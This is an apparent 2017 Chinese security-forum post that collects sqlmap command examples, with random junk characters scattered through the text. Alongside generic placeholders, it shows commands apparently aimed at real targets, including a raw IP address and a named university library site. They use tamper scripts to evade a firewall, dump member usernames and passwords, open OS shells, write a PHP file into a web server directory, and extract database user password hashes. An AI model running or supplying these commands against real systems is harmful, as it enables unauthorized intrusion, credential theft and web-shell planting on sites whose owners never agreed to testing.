找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2064|回复: 0
打印 上一主题 下一主题

sqlmap使用实例

[复制链接]
跳转到指定楼层
楼主
发表于 2017-5-19 17:03:10 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
/pentest/database/sqlmap
+ C, R+ `$ E/ a0 y  M4 R' {  y% ]% R4 O
update :::::>     in the folder   after  execute    following   order : svn update
* P9 z) x. o4 W- X* m( T  _, o- n" x! p0 ^( O1 K
sqlmap.py -r 1.txt --current-db
+ r/ j. {5 y4 ?+ B/ f. O: B+ i: o3 ?- `2 }; F+ R
v 3 –dbms “MySQL” –technique U -p id –batch –tamper “space2morehash.py”$ s7 W$ n7 }$ Z5 j

' g+ H8 e1 c0 y==================基本使用方法==========================elect (select concat(0x7e,0x27,username,0x3a,password,0x27,0x7e) from phpcms_member limit 0,1)) 5 k* B+ a" Q( l) k
猜解数据库, d: _; o- h7 `6 I" G
./sqlmap.py -u "injection-url" --dbs
3 L- r3 _! ~: o. N7 Usqlmap.py -r 1.txt -v 3 --dbs --tamper "space2morehash.py"' T: D  x4 X; h$ c9 U6 ]$ y3 l# q
/ M9 c- H% }* a3 {, b3 `# f- D
猜解表名
6 ]& a. }& x9 o6 O; c: r3 X./sqlmap.py -u "injection-url" -D database_name --tables
( }9 G2 v( P' H! ~) K7 \
5 D3 t' t2 j0 Gsqlmap.py -r 1.txt -v 1 -D jsst --tables --batch --tamper "space2morehash.py"" {! p" {2 v6 [" E. p- x) ]
sqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member_info --columns --batch --tamper "space2morehash.py"
, P% d  \; E, {8 a* a  V1 B0 A* b0 r& e1 B
sqlmap.py -r 1.txt -D mail -T F_domain -C F_email,F_password --dump
: i: @6 B5 p6 T
7 D. P/ a) o9 h( f+ Rsqlmap.py -r 1.txt -v 1 --os-shell --tamper "chardoubleencode.py"
( m8 I9 V* i, C6 x8 Y% Z: {sqlmap.py -r 1.txt -v 3 --os-shell --tamper "chardoubleencode.py"
  n+ \# g! I  W/ ysqlmap.py -r 1.txt -v 3 --file-write c:\help.php --file-dest D:\Bitnami\wampstack-5.4.29-0\apache2\htdocs\en\fckeditor\help888.php --tamper "chardoubleencode.py" & A2 F' y, X: ^4 [) N
sqlmap.py -r 1.txt --dbms "Mysql" --os-shell --tamper "charunicodeencode.py"
% z- }2 V; C# j2 _' O2 W( {
. \$ U; G' v- X' w! O" i+ Q' usqlmap.py -u "http://121.15.0.227/en/list.php?catid=74" --os-shell -v3 --tamper "charunicodeencode.py"
5 B  I7 A3 v/ U& I7 Z1 asqlmap.py -r 1.txt -v 3 --sql-query "desc jsgen_member;" --batch --tamper "space2morehash.py"
$ R. W; Q1 t$ z+ ^sqlmap.py -r 1.txt -v 3 --sql-query "show create table jsgen_member;" --batch --tamper "space2morehash.py"" K! s" Q/ ?, q
sqlmap.py -r 1.txt -v 3 --sql-query "select user();" --batch --tamper "space2morehash.py"
. L7 x2 v' C  z. }sqlmap.py -r 1.txt -D jsst -T phpcms_member -C username,password --dump! Y# ]2 A. C" z% x

" |' x6 i7 A8 L0 b* Fsqlmap.py -r 1.txt -v 3 --dbs  --batch --tamper "space2morehash.py" 绕过防火墙了
- M' k3 ?7 e2 Q0 `) |! rsqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member -C ,userid,username,password, --dump --batch --tamper "space2morehash.py"4 @% \2 E+ G. M, U5 @: `

( \" G8 _' e1 K* L: Z  Ssqlmap.py -r 1.txt --dbms "Mysql" --tables -D "jsst"
7 r$ R" z+ n9 r- ]- Q) l猜解列名
( S& Q. ^4 O$ I1 X./sqlmap.py -u "injection-url" -D database_name -T table_name --columns
) ^- H$ I" b% S- g  e- N% L
6 V  b6 n1 ]) i6 E: a, _sqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member --columns --batch --tamper "space2morehash.py" * b+ P8 p) u$ N4 `) T
sqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_session --columns --batch --tamper "space2morehash.py"
7 A+ x) J$ a! @+ u3 i: Hsqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member -C userid,groupid,username,password,touserid,point,modelid,email,areaid --dump --batch --tamper "charunicodeencode.py". P" k) `% N9 g/ U, D2 [+ o! Y

. o. y/ {: Y) n, Rsqlmap.py -u "http://cityusr.lib.cityu.edu.hk/jspui/simple-search?query=1" --batch --tamper "space2morehash.py"& O! z: G3 @6 C& b
&submit=Go
8 T% O2 M  ~4 k3 I& R- Y& x; \* P猜解值
- a" C5 r: ~1 b./sqlmap.py -u "injection-url" -D database_name -T table_name -C column1,column2 --dump
9 }* `6 v- {* G4 b* M9 ?========================================================
; l( F) J" H0 S4 J! c搜索表名中包括mana字符的
$ o/ z8 J9 T! v( K1 x/sqlmap.py -u "injection-url" -T mana --search
3 }4 K$ q/ T2 g! ], s返回一个交互式sql shell
/ F; i4 ~; f9 o( u2 R/sqlmap.py -u "injection-url" --sql-shell
* `; X+ K0 Q: x读取指定文件(需权限)/ \* _3 K; V8 o! S
/sqlmap.py -u "injection-url" --file-read "c:\boot.ini"
8 p$ P, {& u2 Y6 o+ B查看当前 用户 及 数据库 ; O+ i. T8 u9 N0 u; _3 D1 u/ p
/sqlmap.py -u "injection-url" --current-user --current-db! S( i& Q) b; P' b2 y6 t7 C
本地文件 写入 远程目标绝对路径7 \1 G! y) _$ z/ C, u2 \7 _
/sqlmap.py -u "injection-url" --file-write 本地路径 --file-dest 远程绝对路径4 P4 u9 O) ?5 o: E
sqlmap.py -r 1.txt -v 3 --file-write c:\help.php --file-dest D:/Bitnami/wampstack-5.4.29-0/apache2/htdocs/en/fckeditor\help888.php --tamper "charunicodeencode.py" 3 i! {$ J2 K: x. E4 k8 u
* \1 i8 R# b1 K+ y- |. E. K
sqlmap.py -u "injection-url" --file-write 本地路径 --file-dest 远程绝对路径3 B$ e  t& Z0 l/ Z3 A) {1 h$ m
查看某用的权限& g' m$ H! }. }8 O
/sqlmap.py -u "injection-url" --privileges -U root# c, V$ }5 f# v( {6 o7 A) g  o
查看当前用户是否为dba7 L0 g; ?3 }/ [1 Y+ Q
/sqlmap.py -u "injection-url" --is-dba
+ u3 J8 @1 }7 \& j& p3 t读取所有数据库用户或指定数据库用户的密码
/ C( Q9 K. Q: N1 wsqlmap.py -r 1.txt --users --passwords3 J" c) h/ Q( [4 c
sqlmap.py -r 1.txt -v 3 --users --passwords --batch --tamper "space2morehash.py" 9 A+ O4 C( m; C6 j! v7 H& ]# t2 I  Z
$ `5 b6 I; R- g! O
/sqlmap.py -u "injection-url" --passwords -U root) i, X5 e& a0 Q3 G# W5 x
( L. {/ F# C! }; k0 k9 }  g) O
--start&&--stop 与 --first&&--last 的区别
) ~! R+ ~7 M. g( E/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" -D phpcms -T phpcms_member --start=1 --stop=2 --dump   (--start=1 --stop=2 会列出第二条记录。。。。记录例如:0 1 2 3 ……)
8 q: ?; m1 t# _8 b9 A% }
% c) a: ?6 H' N' r7 ?$ X/ H. T) x1 N从字典中查找(属于暴利破解)存在的表(sqlmap/txt/common-tables.txt)或字段(sqlmap/txt/common-columns.txt)
5 a/ U4 A' b& h1 b/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" -D database-name --common-tables
& a1 N# w: O/ {/ Q4 D  K7 T/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" -D database-name -T table_name --common-columns8 b' N* j5 o" p, p) c1 u/ `
7 i" Z# B# n$ B
执行sql语句,如查询@@datadir得到数据库路径(或者user()/database()等等……)4 B7 P& N& m+ p$ z/ Q
/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" --sql-query "select @@ip"
6 S, t1 j3 [. W% S. B0 i5 }
" q6 ~4 O+ Q6 k# C  v, e$ L
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表